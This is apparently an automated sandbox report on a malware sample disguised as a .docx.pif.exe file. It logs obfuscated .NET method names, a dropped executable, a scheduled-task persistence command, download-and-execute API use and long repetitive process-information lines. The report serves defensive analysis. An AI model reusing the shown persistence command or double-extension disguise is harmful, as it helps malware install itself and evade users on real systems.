                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, SgBrdEKGapRfKEKkNh.csHigh entropy of concatenated method names: 'b5WeuaXnF', 'YjHZGiX7Y', 'R7BTVxfZk', 'FGHbPNuMS', 'KZY1JCQnM', 'XSrEqPofF', 'vKfgkcD8PCy0jh8eIi', 'NfIKNlCuym4prw6cmX', 'XMmyUUe55', 'OmA9Y4kE7'
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, OpOgmCw6PPUf8olH7e.csHigh entropy of concatenated method names: 'lCSMt1g6rh', 'uxyM11trDN', 'MRpMukmKFN', 'Y28MNRm8OM', 'oK3MhnWw5x', 'd6iM60vqO1', 'ApuMPNwdt1', 'bBZMr7DNuO', 'EHGMsZAr8Q', 'DYtMJObaU1'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00406EB0 ShellExecuteW,URLDownloadToFileW,15_2_00406EB0
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeFile created: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,15_2_0041AA4A

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: Possible double extension: docx.pifStatic PE information: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041CB50
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
